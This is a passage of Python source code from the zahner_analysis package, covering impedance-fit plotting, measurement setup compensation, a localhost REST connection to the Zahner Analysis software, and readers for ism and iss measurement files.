return IsfxModelImport(xmlString=reply.content.decode("utf-8"))
def _readFitInputData(self, jobId) -> IsmImport:
"""
Reading the Samples used for fit from the Zahner Analysis.
Reading is done via http get request.
:param jobId: JobId.
:returns: Object from received data.
"""
reply = self._analysisConnection.get(f"/job/{jobId}/samples")
return IsmImport(reply.content)
def _readSimulatedData(self, jobId) -> IsmImport:
"""Reading the simulation data from the Zahner Analysis.
Reading is done via http get request.
:param jobId: JobId.
:returns: Object from received data.
"""
reply = self._analysisConnection.get(f"/job/{jobId}/simulation")
return IsmImport(reply.content)
class EisFittingPlotter:
"""
Class with utility Nyquist and Bode plotting methods.
This class contains methods to display the fit results in the style of Zahner Analysis.
"""
@staticmethod
def plotBode(
fittingResult: EisFittingResult,
impedanceData: IsmImport = None,
axes=None,
zTogetherPhase=True,
absPhase=True,
):
"""Plotting the data in the Bode plot.
For plotting matplotlib is used with the function :meth:`zahner_analysis.plotting.impedance_plot.bodePlot`.
With this function or also only with matplotlib the plot can be represented adapted.
This method displays the plot in the standard Zahner Analysis design.
Either axes can be passed on which will be plotted, or a new figure with axes will be created
automatically. The figure and the axes are always returned.
If the impedanceData is not passed, then the samples used for the fit are displayed.
The Zahner Analysis default setting impedance and phase in a plot and phase in magnitude can be deactivated with two parameters.
The following code block shows a few snippets as an example:
.. code-block:: python
fig, ax = plt.subplots(2,2)
(fig, (impedanceAxis, phaseAxis)) = EisFittingPlotter.plotBode(fittingResult, axes=(ax[0,0],ax[1,0]))
(fig, (impedanceAxis, phaseAxis)) = EisFittingPlotter.plotBode(fittingResult, axes=(ax[0,1],ax[1,1]))
impedanceAxis.legend(["Measured Data", "Fitted Model"])
plt.show()
# or
(fig2, (impedanceAxis2, phaseAxis2)) = EisFittingPlotter.plotBode(fittingResult)
impedanceAxis2.legend(["Measured Data", "Fitted Model"])
fig2.set_size_inches(18, 10)
plt.show()
:param fittingResult: Fitting result object.
:param impedanceData: Optional impedance data for display.
:param axes: Tuple (impedanceAxis, phaseAxis) with impedance and phase axes object, or None if a new figure should be created.
:param zTogetherPhase: Default True to display phase and impedance in one plot.
:param absPhase: Default True to plot the absolute value of the phase.
:returns: Tuple fig, axes
"""
fig = None
if impedanceData is not None:
(fig, axes) = bodePlotter(
axes,
impedanceObject=impedanceData,
zTogetherPhase=zTogetherPhase,
absPhase=absPhase,
)
else:
(fig, axes) = bodePlotter(
axes,
impedanceObject=fittingResult.getFitInputData(),
zTogetherPhase=zTogetherPhase,
absPhase=absPhase,
)
(fig, axes) = bodePlotter(
axes,
impedanceObject=fittingResult.getFittedSimulatedData(),
zTogetherPhase=zTogetherPhase,
absPhase=absPhase,
argsImpedanceAxis={"linestyle": "solid", "marker": None},
argsPhaseAxis={"linestyle": "solid", "marker": None},
)
return fig, axes
@staticmethod
def plotNyquist(
fittingResult: EisFittingResult,
impedanceData: IsmImport = None,
ax=None,
minusNyquist=True,
maximumAbsImpedance: float = None,
):
"""
Plotting the data in the Nyquist plot.
For plotting matplotlib is used with the function :meth:`zahner_analysis.plotting.impedance_plot.nyquistPlot`.
With this function or also only with matplotlib the plot can be represented adapted.
This method displays the plot in the standard Zahner Analysis design.
Either axes can be passed on which will be plotted, or a new figure with axes will be created
automatically. The figure and the axes are always returned.
If the impedanceData is not passed, then the samples used for the fit are displayed.
The following code block shows a snippet as an example:
.. code-block:: python
(fig, ax) = EisFittingPlotter.plotBode(fittingResult, maximumAbsImpedance=1)
ax.legend(["Measured Data", "Fitted Model"])
plt.show()
:param fittingResult: Fitting result object.
:param impedanceData: Optional impedance data for display.
:param ax: The axis on which to plot, or None to create a new figure.
:param minusNyquist: Default True to invert the imaginary part of the impedance.
:param maximumAbsImpedance: If the value is not None, only impedances whose absolute value is smaller than this value are plotted.
:returns: Tuple fig, ax
"""
fig = None
if impedanceData is not None:
(fig, ax) = nyquistPlotter(
ax,
impedanceObject=impedanceData,
minusNyquist=minusNyquist,
maximumAbsImpedance=maximumAbsImpedance,
)
else:
(fig, ax) = nyquistPlotter(
ax,
impedanceObject=fittingResult.getFitInputData(),
minusNyquist=minusNyquist,
maximumAbsImpedance=maximumAbsImpedance,
)
(fig, ax) = nyquistPlotter(
ax,
impedanceObject=fittingResult.getFittedSimulatedData(),
minusNyquist=minusNyquist,
argsNyquistAxis={"linestyle": "solid", "marker": None, "color": "#40e0d0"},
maximumAbsImpedance=maximumAbsImpedance,
)
return fig, ax | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/analysis_tools/eis_fitting.py | eis_fitting.py |
from zahner_analysis.file_import.ism_import import IsmImport
from scipy.signal import savgol_filter
import numpy as np
import copy
from typing import Union, Optional
def interpolateIsmToImpedanceArray(
ism: IsmImport, frequencyPoints: list[float]
) -> np.array:
"""
Function for the interpolation of spectra.
:param ism: Object with spectrum.
:param frequencyPoints: Frequency points which are to be interpolated.
:return: Array with interpolated impedance points.
"""
return np.interp(
frequencyPoints, ism.getFrequencyArray(), ism.getComplexImpedanceArray()
)
def smoothIsm(ism: IsmImport, window_length: int, polyorder: int) -> IsmImport:
"""
Smoothen the ism data with a savgol filter.
https://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.savgol_filter.html
:param ism: ism data which are smoothed.
:param window_length: Window length for smoothening.
:param polyorder: Polynomial order must be greater than window length.
:return: Smoothed ism data.
"""
freqArray = ism.getFrequencyArray()
ism.frequency = freqArray
ism.impedance = savgol_filter(ism.getImpedanceArray(), window_length, polyorder)
ism.phase = savgol_filter(ism.getPhaseArray(), window_length, polyorder)
ism.fromIndex = 0
ism.toIndex = len(ism.impedance)
ism.swapNecessary = False
return ism
class SetupCompensation(object):
"""
Object which contains the data and methods to compensate ism data.
⚠️WARNING⚠️
* **The results must be checked for plausibility, since incorrectly performed short, open and load measurements can also degrade the measurement results.**
* **With a second measurement of a known object it must be verified if the compensation works or if it worsens the result.**
* **The cable routing must not change after the calibration measurement. Since the cable routing and its impedance and parasitic properties are part of the calibration data.**
* **For the best possible correction, the point density of the calibration measurements must be greater than or equal to that of the measurement to be corrected.**
* **The calibration data are smoothed before the calculation, for this the window length and the polynomial order must be defined.**
* **The order of the polynomial and the length of the window must be set by the user, this affects the result.**
The formulas for the correction were derived from a theoretical four terminal network, which corresponds to the parasitic behavior of the measuring device and the setup.
This formula is universal. It does not depend on the instrument used:
.. math::
Z=\\frac{(Z_{\\text{short}}-Z_{\\text{meas}})(Z_{\\text{load}}-Z_{\\text{open}})}{(Z_{\\text{short}}-Z_{\\text{load}})(Z_{\\text{meas}}-Z_{\\text{open}})} \cdot Z_{\\text{load,ref}}
.. list-table::
:widths: 50 50
:header-rows: 1
* - Parameter
- Description
* - :math:`Z_{\\text{short}}`
- Measurement without object. Short-circuited 4-wire test setup. CE, RE, WE power and WE sense are connected together.
* - :math:`Z_{\\text{open}}`
- Measurement without object. CE and RE as well as WE power and WE sense are connected to each other.
* - :math:`Z_{\\text{load}}`
- Measurement with a reference object of known defined impedance over the frequency range.
* - :math:`Z_{\\text{load,ref}}`
- Real impedance of the reference object of $Z_{\text{load}}$ measurement.
* - :math:`Z_{\\text{meas}}`
- Measurement to be corrected.
* - :math:`Z`
- Measurement result corrected with the short, open and load data.
Basic Usage:
.. code-block::
originalData = IsmImport("./ExampleData/500uR_measurement_pro.ism")
compensatedDataFileName = (
"./ExampleData/500uR_measurement_pro_short_compensated.ism"
)
compensationData = SetupCompensation(
shortData="./ExampleData/short_circuit_measurement_pro.ism"
)
compensatedData = compensationData.compensateIsm(originalData)
:param shortData: short data for correction, defaults to None.
:param openData: open data for correction, defaults to None.
:param loadData: load data for correction, defaults to None.
:param referenceData: real value of load data for correction, defaults to None. Here you can simply pass a number, for example 1 for 1 Ohm reference object.
:param smoothingWindowLength: Length of the smoothing window, defaults to 5.
:param smoothingPolyOrder: Length of the smoothing poly, defaults to 3.
"""
def __init__(
self,
shortData: Optional[Union[IsmImport, str, complex]] = None,
openData: Optional[Union[IsmImport, str, complex]] = None,
loadData: Optional[Union[IsmImport, str, complex]] = None,
referenceData: Optional[Union[IsmImport, str, complex]] = None,
smoothingWindowLength: Optional[int] = 5,
smoothingPolyOrder: Optional[int] = 3,
):
if shortData is None:
self.shortData = 0 + 0j
else:
if isinstance(shortData, str):
self.shortData = IsmImport(shortData)
else:
self.shortData = shortData
if openData is None:
self.openData = 1e15 + 0j
else:
if isinstance(openData, str):
self.openData = IsmImport(openData)
else:
self.openData = openData
if loadData is None and referenceData is None:
self.loadData = 1 + 0j
self.referenceData = 1 + 0j
elif loadData is not None and referenceData is not None:
if isinstance(loadData, str):
self.loadData = IsmImport(loadData)
else:
self.loadData = loadData
if isinstance(referenceData, str):
self.referenceData = IsmImport(referenceData)
elif isinstance(referenceData, IsmImport):
self.referenceData = referenceData
else:
self.referenceData = referenceData
else:
raise ValueError("loadData requiers referenceData")
self.smoothingWindowLength = smoothingWindowLength
self.smoothingPolyOrder = smoothingPolyOrder
return
def setSmoothingWindowLength(self, value: int):
"""
Sets the length of the smoothing window. Must be smaller than the poly length.
:param value: Length of the smoothing window.
"""
self.smoothingWindowLength = value
return
def getSmoothingWindowLength(self) -> int:
"""
Length of the smoothing window.
:return: Length of the smoothing window.
"""
return self.smoothingWindowLength
def setSmoothingPolyOrder(self, value: int):
"""
Sets the length of the smoothing polynomial. Must be greater than the window length.
:param value: Length of the smoothing poly.
"""
self.smoothingPolyOrder = value
return
def getSmoothingPolyOrder(self) -> int:
"""
Length of the smoothing poly.
:return: Length of the smoothing poly.
"""
return self.smoothingPolyOrder
def compensateIsm(
self, ism: Union[IsmImport, str], conjugateShort: bool = False
) -> IsmImport:
"""
Compensate ism Data.
This function can be used to apply the Short Open and Load data to the passed impedance data.
You can then call this function several times to correct different data with the same data.
:param ism: Data which are to be compensated.
:param conjugateShort: Conjugate the short data., defaults to False.
:return: Impedance object which was compensated.
"""
if isinstance(ism, str):
ism = IsmImport(ism)
Zism = ism.getComplexImpedanceArray()
if isinstance(self.shortData, IsmImport):
Zshort = interpolateIsmToImpedanceArray(
smoothIsm(
self.shortData, self.smoothingWindowLength, self.smoothingPolyOrder
),
ism.getFrequencyArray(),
)
else:
Zshort = np.array([self.shortData for _ in ism.getFrequencyArray()])
if isinstance(self.openData, IsmImport):
Zopen = interpolateIsmToImpedanceArray(
smoothIsm(
self.openData, self.smoothingWindowLength, self.smoothingPolyOrder
),
ism.getFrequencyArray(),
)
else:
Zopen = np.array([self.openData for _ in ism.getFrequencyArray()])
if isinstance(self.loadData, IsmImport):
Zload = interpolateIsmToImpedanceArray(
smoothIsm(
self.loadData, self.smoothingWindowLength, self.smoothingPolyOrder
),
ism.getFrequencyArray(),
)
else:
Zload = np.array([self.loadData for _ in ism.getFrequencyArray()])
if isinstance(self.referenceData, IsmImport):
Zreference = interpolateIsmToImpedanceArray(
smoothIsm(
self.referenceData,
self.smoothingWindowLength,
self.smoothingPolyOrder,
),
ism.getFrequencyArray(),
)
else:
Zreference = np.array([self.referenceData for _ in ism.getFrequencyArray()])
if conjugateShort == True:
Zshort = np.conjugate(Zshort)
Zcompensated = (
((Zshort - Zism) * (Zload - Zopen)) / ((Zism - Zopen) * (Zshort - Zload))
) * Zreference
compensatedIsm = copy.deepcopy(ism)
compensatedIsm.frequency = ism.getFrequencyArray()
compensatedIsm.impedance = np.abs(Zcompensated)
compensatedIsm.phase = np.angle(Zcompensated)
compensatedIsm.fromIndex = 0
compensatedIsm.toIndex = len(compensatedIsm.impedance)
compensatedIsm.swapNecessary = False
return compensatedIsm | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/analysis_tools/setup_compensation.py | setup_compensation.py |
import requests
import subprocess
import os
import logging
import time
class AnalysisConnection:
"""Class which manages the connection to the Zahner Analysis Software.
The Zahner Analysis Software performs all calculations.
The Python library communicates with the Zahner Analysis via a REST interface.
Various optional settings are possible. In the standard configuration it is checked if a
Zahner Analysis with server is running, if this is not the case the Zahner Analysis is automatically
started and automatically closed again.
:param ip: IP address under which the server is found. 127.0.0.1 if it is running on the same computer.
:param port: Port of the server.
:param tryToConnect: True to test if the Zahner Analysis Server is reachable.
:param tryToStart: If tryToConnect is True and tryToStart is True, then the Zahner Analysis is tried to start under windows systems.
:param onlineCheckUrl: This URL is used to check if the Zahner Analysis can be reached.
:param apiKey: The key is used as a security feature to prevent others from accessing the Zahner Analysis.
:param buffer_size: Optimization parameter: The buffer for incomming file uploads. If too small the server has to reallocate bigger amounts of memory more often. Bigger amount means more memory allocation even if not needed.
:param keep_jobs: Number of finished fitting jobs to keep for the client to download results and check the status.
:param timeToWaitForOnline: This is the time for which is waited until the Zahner Analysis is online after it has been started. This time varies depending on the speed of the computer.
:param keepOpen: If this parameter is True, the Zahner Analysis will not be closed when it is no longer needed.
"""
def __init__(
self,
ip="127.0.0.1",
port=8081,
tryToConnect=True,
tryToStart=True,
onlineCheckUrl="/id",
apiKey="PyAnalysis",
buffer_size=32768,
keep_jobs=3,
timeToWaitForOnline=10,
keepOpen=False,
):
self._ip = ip
self._port = port
self._ip = f"http://{self._ip}:{self._port}"
self._onlineCheckUrl = onlineCheckUrl
self._apiKey = apiKey
self._subprocess = None
self._keepOpen = keepOpen
if tryToConnect:
if self.isOnline() is False:
if tryToStart:
self.tryToStartAnalysis(buffer_size, keep_jobs, timeToWaitForOnline)
return
def tryToStartAnalysis(self, buffer_size=32768, keep_jobs=3, timeToWaitForCheck=10):
"""Function which tries to start the Zahner Analysis.
This function writes information with the logging module.
:param buffer_size: Optimization parameter: The buffer for incomming file uploads. If too small the server has to reallocate bigger amounts of memory more often. Bigger amount means more memory allocation even if not needed.
:param keep_jobs: Number of finished fitting jobs to keep for the client to download results and check the status.
:param timeToWaitForOnline: This is the time for which is waited until the Zahner Analysis is online after it has been started. This time varies depending on the speed of the computer.
"""
opened = False
if os.name == "nt":
# Try to start Zahner Analysis only on Windows.
opened = True
try:
try:
logging.debug("Zahner Analysis 64 bit registry search")
import winreg
reg_key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Zahner\\Analysis",
0,
winreg.KEY_READ,
)
except:
logging.debug("Zahner Analysis 32 bit registry search")
reg_key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\\Zahner\\Analysis",
0,
winreg.KEY_READ | winreg.KEY_WOW64_32KEY,
)
finally:
path = winreg.QueryValueEx(reg_key, "Path")[0]
reg_key.Close()
path += " --remoteEval"
path += f",port={self._port}"
path += f",key={self._apiKey}"
path += f",buffer_size={buffer_size}"
path += f",keep_jobs={keep_jobs}"
self._subprocess = subprocess.Popen(path)
time.sleep(1) # wait one second default
except:
opened = False
if opened:
logging.info("Zahner Analysis launched")
startTime = time.time()
# Wait up to timeToWaitForCheck seconds until the server is online.
while (
timeToWaitForCheck > (time.time() - startTime)
and self.isOnline() is False
):
logging.info("Zahner Analysis server offline - retry")
time.sleep(0.5)
if self.isOnline() is False:
logging.error("Zahner Analysis launched but server is offline")
else:
logging.error("Zahner Analysis can not be launched")
return opened
def isOnline(self, timeout=0.5):
"""Returns the online state
This function returns true if the Zahner Analysis can be reached.
This function writes information with the logging module.
:param timeout: Timeout, for the get command.
:returns: True if the Zahner Analysis is online.
"""
retval = True
try:
resp = self.get(self._onlineCheckUrl, timeout=timeout)
if resp.json()["license-status"] == "invalid":
retval = False
logging.info("Zahner Analysis server online - license invalid")
else:
logging.info("Zahner Analysis server online")
except:
logging.info("Zahner Analysis server offline")
retval = False
return retval
def get(self, url=None, *args, **kwargs):
"""get request wrapper
This function wraps the get request. Only the relative URL path to the root must be specified.
This function automatically adds ip, port and api key.
If a full path with http is specified, then this path will be used and will not be edited.
:param url: url for request.
:returns: Reply from requests.get
"""
return requests.get(self._urlComposer(url), *args, **kwargs)
def post(self, url=None, *args, **kwargs):
"""post request wrapper
This function wraps the post request. Only the relative URL path to the root must be specified.
This function automatically adds ip, port and api key.
If a full path with http is specified, then this path will be used and will not be edited.
:param url: URL for request.
:returns: Reply from requests.post
"""
return requests.post(self._urlComposer(url), *args, **kwargs)
def _urlComposer(self, url):
"""Composition of the URL
This function composes the URL with IP, port and api key if there is no "http" in the url parameter.
:param url: URL relative or absolute.
:returns: Composed URL.
"""
if url is None:
url = self._ip
elif "http" in url:
pass
else:
url = f"{self._ip}{url}?key={self._apiKey}"
return url
def __del__(self):
"""Destructor
If the library has opened the Zahner Analysis, then it will be closed again. If keepOpen is set, it will not be closed.
"""
if self._subprocess is not None:
if self._keepOpen is False:
self._subprocess.kill()
return | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/analysis_tools/analysis_connection.py | analysis_connection.py |
import numpy as np
import datetime
import io
import os
import datetime
from typing import Union
from zahner_analysis.file_import.thales_file_utils import *
class IsmImport:
"""
Class to be able to read ism files.
This class extracts the data from the ism files.
It returns the data for the frequency range between the reversal frequency and the end frequency.
:param file: The path to the ism file, or the ism file as bytes or bytearray.
"""
def __init__(self, filename: Union[str, bytes, bytearray]):
self._filename = "FromBytes.ism"
if isinstance(filename, bytes) or isinstance(filename, bytearray):
self._binaryFileContent = filename
ismFile = io.BytesIO(filename)
else:
(_, self._filename) = os.path.split(filename)
with open(filename, "rb") as f:
self._binaryFileContent = f.read()
ismFile = open(filename, "rb")
version = readI6FromFile(ismFile)
self.numberOfSamples = readI6FromFile(ismFile) + 1
self.frequency = readF8ArrayFromFile(ismFile, self.numberOfSamples)
self.impedance = readF8ArrayFromFile(ismFile, self.numberOfSamples)
self.phase = readF8ArrayFromFile(ismFile, self.numberOfSamples)
self.measurementTimeStamp = readTimeStampDateTimeArrayFromFile(
ismFile, self.numberOfSamples
)
self.significance = readI2ArrayFromFile(ismFile, self.numberOfSamples)
self.acqChannels = dict()
self.measurementDate = readZahnerDate(ismFile)
self.system = readZahnerStringFromFile(ismFile)
self.potential = readZahnerStringFromFile(ismFile)
self.current = readZahnerStringFromFile(ismFile)
self.temperature = readZahnerStringFromFile(ismFile)
self.time = readZahnerStringFromFile(ismFile)
self.comment_1 = readZahnerStringFromFile(ismFile)
self.comment_2 = readZahnerStringFromFile(ismFile)
self.comment_3 = readZahnerStringFromFile(ismFile)
self.comment_4 = readZahnerStringFromFile(ismFile)
self.areaForCurrentDensity = readZahnerStringFromFile(ismFile)
serialQuantityStuff = readZahnerStringFromFile(ismFile)
acquisition_flag = readI2FromFile(ismFile)
kValues = readF8ArrayFromFile(ismFile, 32)
k_value_27 = int(kValues[27])
if acquisition_flag > 256 and (k_value_27 & 32768) == 32768:
self.acqChannels["Voltage/V"] = np.ndarray(
shape=(self.numberOfSamples,), dtype=">f8"
)
self.acqChannels["Current/A"] = np.ndarray(
shape=(self.numberOfSamples,), dtype=">f8"
)
for index in range(self.numberOfSamples):
self.acqChannels["Voltage/V"][index] = readF8FromFile(ismFile)
self.acqChannels["Current/A"][index] = readF8FromFile(ismFile)
self._metaData = bytearray(ismFile.read())
ismFile.close()
"""
The frequency range at the beginning, which is measured overlapping, is not returned,
therefore now the array indices are determined in which range the data are, which are
returned by the getters.
"""
self.minFrequencyIndex = np.argmin(self.frequency)
self.maxFrequencyIndex = np.argmax(self.frequency)
self.swapNecessary = False
self.fromIndex = self.minFrequencyIndex
self.toIndex = self.maxFrequencyIndex
if self.minFrequencyIndex > self.maxFrequencyIndex:
self.swapNecessary = True
self.fromIndex = self.maxFrequencyIndex
self.toIndex = self.minFrequencyIndex
self.toIndex += 1
return
def getNumberOfSamples(self) -> int:
"""
Returns the complete number of samples.
This function returns the number of samples in the ism file.
:returns: Number of total samples.
"""
return self.numberOfSamples
def _arraySlice(
self, array: np.ndarray, includeDoubleFrequencies: bool = False
) -> np.ndarray:
"""
Can return the array range without duplicate frequency support points.
For numpy and other libraries there must not be any duplicate frequency support points, therefore this function trims the array range.
:param array: Array that is processed.
:param includeDoubleFrequencies: If True, all measurement data are returned, if False, only the largest non-overlapping area is returned. Defaults to False.
:return: The eventually trimmed array.
"""
retval = array
if includeDoubleFrequencies is False:
retval = retval[self.fromIndex : self.toIndex]
if self.swapNecessary:
return np.flip(retval)
else:
return retval
def getFrequencyArray(self, includeDoubleFrequencies: bool = False) -> np.ndarray:
"""
Get the frequency points from the measurement.
:param includeDoubleFrequencies: If True, all measurement data are returned, if False, only the largest non-overlapping area is returned. Defaults to False.
:returns: Numpy array with the frequency points.
"""
return self._arraySlice(self.frequency, includeDoubleFrequencies)
def getImpedanceArray(self, includeDoubleFrequencies: bool = False) -> np.ndarray:
"""
Get the impedance points from the measurement.
:param includeDoubleFrequencies: If True, all measurement data are returned, if False, only the largest non-overlapping area is returned. Defaults to False.
:returns: Numpy array with the impedance points.
"""
return self._arraySlice(self.impedance, includeDoubleFrequencies)
def getPhaseArray(
self, degree: bool = False, includeDoubleFrequencies: bool = False
) -> np.ndarray:
"""
Get the phase points from the measurement.
:param degree: True for phase in degree, default radiant.
:param includeDoubleFrequencies: If True, all measurement data are returned, if False, only the largest non-overlapping area is returned. Defaults to False.
:returns: Numpy array with the phase points as radiant.
"""
radToDegree = 1.0
if degree == True:
radToDegree = 360 / (2 * np.pi)
return self._arraySlice(self.phase, includeDoubleFrequencies) * radToDegree
def getComplexImpedanceArray(
self, includeDoubleFrequencies: bool = False
) -> np.ndarray:
"""
Get the complex impedance points from the measurement.
:param includeDoubleFrequencies: If True, all measurement data are returned, if False, only the largest non-overlapping area is returned. Defaults to False.
:returns: Numpy array with the complex impedance points.
"""
imp = self.getImpedanceArray(includeDoubleFrequencies)
phase = self.getPhaseArray(includeDoubleFrequencies=includeDoubleFrequencies)
return np.cos(phase) * imp + 1j * np.sin(phase) * imp
def getSignificanceArray(
self, includeDoubleFrequencies: bool = False
) -> np.ndarray:
"""
Get the significance points from the measurement.
:param includeDoubleFrequencies: If True, all measurement data are returned, if False, only the largest non-overlapping area is returned. Defaults to False.
:returns: Numpy array with the significance points.
"""
return self._arraySlice(self.significance, includeDoubleFrequencies)
def getMeasurementDateTimeArray(
self, includeDoubleFrequencies: bool = False
) -> np.ndarray:
"""
Get the timestamps from the measurement.
:param includeDoubleFrequencies: If True, all measurement data are returned, if False, only the largest non-overlapping area is returned. Defaults to False.
:returns: Numpy array with the datetime objects.
"""
return self._arraySlice(self.measurementTimeStamp, includeDoubleFrequencies)
def getMeasurementStartDateTime(self) -> datetime.datetime:
"""
Get the start date time of the measurement.
Returns the start datetime of the measurement.
:returns: datetime object with the start time of the measurement.
"""
return min(self.measurementTimeStamp)
def getMeasurementEndDateTime(self) -> datetime.datetime:
"""
Get the end date time of the measurement.
Returns the end datetime of the measurement.
:returns: datetime object with the end time of the measurement.
"""
return max(self.measurementTimeStamp)
def save(self, filename):
"""
Save the impedance data.
Only the binary file content that has been read is saved. If the data is edited, this is not saved.
:param filename: Path and filename of the file to be saved with the extension .ism.
"""
with open(filename, "wb") as f:
f.write(self._binaryFileContent)
return
def getFileName(self) -> str:
"""
Get the name of the file.
:returns: The filename if the file was opened or "FromBytes.ism" if it was created from bytearrays.
"""
return self._filename
def getBinaryFileContent(self) -> bytearray:
"""
Get the content of the file binary.
Returns the file contents as a binary byte array.
:returns: bytearray with the file content.
"""
return self._binaryFileContent
def getMetaData(self) -> bytearray:
"""
Get the meta data of the file binary.
Returns the file contents as a binary byte array.
:returns: bytearray with the file content.
"""
return self._metaData
def getTrackTypesList(self) -> list[str]:
"""
returns a list with the different data tracks.
:returns: List with the track names.
"""
return list(map(str, self.acqChannels.keys()))
def getTrack(
self, track: str, includeDoubleFrequencies: bool = False
) -> np.ndarray:
"""
returns an array with the points for the given track.
:param track: name of the track.
:param includeDoubleFrequencies: If True, all measurement data are returned, if False, only the largest non-overlapping area is returned. Defaults to False.
:returns: Numpy array with the track.
"""
return self._arraySlice(self.acqChannels[track], includeDoubleFrequencies) | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/file_import/ism_import.py | ism_import.py |
import numpy as np
import io
import re
import os
import datetime
from zahner_analysis.file_import.thales_file_utils import *
class IssImport:
"""Class to be able to read out iss files (I/E, Current Voltage Curves).
This class extracts the data from the iss files.
:param file: The path to the iss file, or the iss file as bytes or bytearray.
:type file: str, bytes, bytearray
"""
def __init__(self, filename):
self._filename = "FromBytes.iss"
if isinstance(filename, bytes) or isinstance(filename, bytearray):
self._binaryFileContent = filename
issFile = io.BytesIO(filename)
else:
(_, self._filename) = os.path.split(filename)
with open(filename, "rb") as f:
self._binaryFileContent = f.read()
issFile = open(filename, "rb")
self.EdgePotential0 = readF8FromFile(issFile)
self.EdgePotential1 = readF8FromFile(issFile)
self.EdgePotential2 = readF8FromFile(issFile)
self.EdgePotential3 = readF8FromFile(issFile)
self.Resolution = readF8FromFile(issFile)
self.variable_a = readF8FromFile(issFile)
self.variable_b = readF8FromFile(issFile)
self.RelativeTolerance = readF8FromFile(issFile)
self.AbsoluteTolerance = readF8FromFile(issFile)
self.OhmicDrop = readF8FromFile(issFile)
numberOfElements = readI6FromFile(issFile) + 1
intVoltageRead = readI2ArrayFromFile(issFile, numberOfElements)
self.current = readF8ArrayFromFile(issFile, numberOfElements)
self.time = readF8ArrayFromFile(issFile, numberOfElements)
self.Date = readZahnerStringFromFile(issFile)
self.System = readZahnerStringFromFile(issFile)
self.Temperature = readZahnerStringFromFile(issFile)
self.Time = readZahnerStringFromFile(issFile)
self.Slew_Rate = readZahnerStringFromFile(issFile)
self.Comment_1 = readZahnerStringFromFile(issFile)
self.Comment_2 = readZahnerStringFromFile(issFile)
self.Comment_3 = readZahnerStringFromFile(issFile)
self.Comment_4 = readZahnerStringFromFile(issFile)
self.Comment_5 = readZahnerStringFromFile(issFile)
self.ElectrodeArea = readZahnerStringFromFile(issFile)
self.POPF = readZahnerStringFromFile(issFile)
starttime, endtime = self.Time.split("-")
try:
self.measurementStartDateTime = datetime.datetime.strptime(
self.Date + starttime, "%d%m%y%H:%M:%S"
)
self.measurementEndDateTime = datetime.datetime.strptime(
self.Date + endtime, "%d%m%y%H:%M:%S"
)
except:
# something is incorrect with the file format.
self.measurementStartDateTime = None
self.measurementEndDateTime = None
offset = 0.0
factor = 1.0
popfPattern = "^\s*(.*?),\s*(.*?)\s*PO.PF.*Ima.*?,(.*?), *(.*)$"
popfMatch = re.search(popfPattern, self.POPF)
if popfMatch:
offset = float(popfMatch.group(1))
factor = float(popfMatch.group(2))
PowerOfPotentialScaling = float(popfMatch.group(3))
ExtraOffsetX = float(popfMatch.group(4))
else:
# fallback to old format for older ISC files:
popfPattern = "^\s*(.*?),\\s*(.*?)\s*PO.PF.*"
popfMatch = re.search(popfPattern, self.POPF)
if popfMatch:
offset = float(popfMatch.group(1))
factor = float(popfMatch.group(2))
self.voltage = intVoltageRead * (factor / 8000.0) + offset
return
def getMeasurementStartDateTime(self) -> datetime.datetime:
"""Get the start date time of the measurement.
Returns the start datetime of the measurement.
:returns: datetime object with the start time of the measurement.
"""
return self.measurementStartDateTime
def getMeasurementEndDateTime(self) -> datetime.datetime:
"""Get the end date time of the measurement.
Returns the end datetime of the measurement.
:returns: datetime object with the end time of the measurement.
"""
return self.measurementEndDateTime
def getTimeArray(self) -> np.ndarray:
"""Reading the measurement time stamps.
:returns: Numpy array with the time points.
"""
return self.time
def getCurrentArray(self) -> np.ndarray:
"""Reading the measurement current points.
:returns: Numpy array with the current points.
"""
return self.current
def getVoltageArray(self) -> np.ndarray:
"""Reading the measurement voltage points.
:returns: Numpy array with the voltage points.
"""
return self.voltage
def save(self, filename):
"""Save the cv data.
Only the binary file content that has been read is saved. If the data is edited, this is not saved.
:param filename: Path and filename of the file to be saved with the extension .ism.
"""
with open(filename, "wb") as f:
f.write(self._binaryFileContent)
return
def getFileName(self) -> str:
"""Get the name of the file.
:returns: The filename if the file was opened or "FromBytes.isc" if it was created from bytearrays.
"""
return self._filename
def getBinaryFileContent(self) -> bytearray:
"""Get the content of the file binary.
Returns the file contents as a binary byte array.
:returns: bytearray with the file content.
"""
return self._binaryFileContent | zahner-analysis | /zahner_analysis-1.1.0.tar.gz/zahner_analysis-1.1.0/zahner_analysis/file_import/iss_import.py | iss_import.py |
import xml.etree.ElementTree as et
import re
import os
class IsfxModelElementParameter:
"""Class which represents a parameter of a circuit element.
This constructor is only used by the class IsfxModelElement.
:param xmlElement: The parameter.
:param xmlParentTag: The parent circuit element tag.
"""
elementParameterIndex = {
"resistor": {
"0": {"name": "R", "unit": "Ω"},
},
"inductor": {
"0": {"name": "L", "unit": "H"},
},
"capacitor": {
"0": {"name": "C", "unit": "F"},
},
"spherical-diffusion": {
"0": {"name": "W", "unit": "Ωs^(-½)"},
"1": {"name": "k", "unit": "1/s"},
},
"young-goehr-impedance": {
"0": {"name": "C", "unit": "F"},
"1": {"name": "p", "unit": ""},
"2": {"name": "T", "unit": "s"},
},
"warburg-impedance": {
"0": {"name": "W", "unit": "Ωs^(-½)"},
},
"nernst-diffusion": {
"0": {"name": "W", "unit": "Ωs^(-½)"},
"1": {"name": "k", "unit": "1/s"},
},
"finite-diffusion": {
"0": {"name": "W", "unit": "Ωs^(-½)"},
"1": {"name": "k", "unit": "1/s"},
},
"homogenous-reaction-impedance": {
"0": {"name": "W", "unit": "Ωs^(-½)"},
"1": {"name": "k", "unit": "1/s"},
},
"constant-phase-element": {
"0": {"name": "C_eq", "unit": "F"},
"1": {"name": "α", "unit": ""},
"2": {"name": "f_norm", "unit": "Hz"},
},
}
xml: et.Element
xmlParentTag: str
def __init__(self, elementXML, xmlParentTag=None):
self.xml = elementXML
self.xmlParentTag = xmlParentTag
return
def getName(self) -> str:
"""Returns the name of the parameter.
:returns: The name.
"""
if self.xml.find("name"):
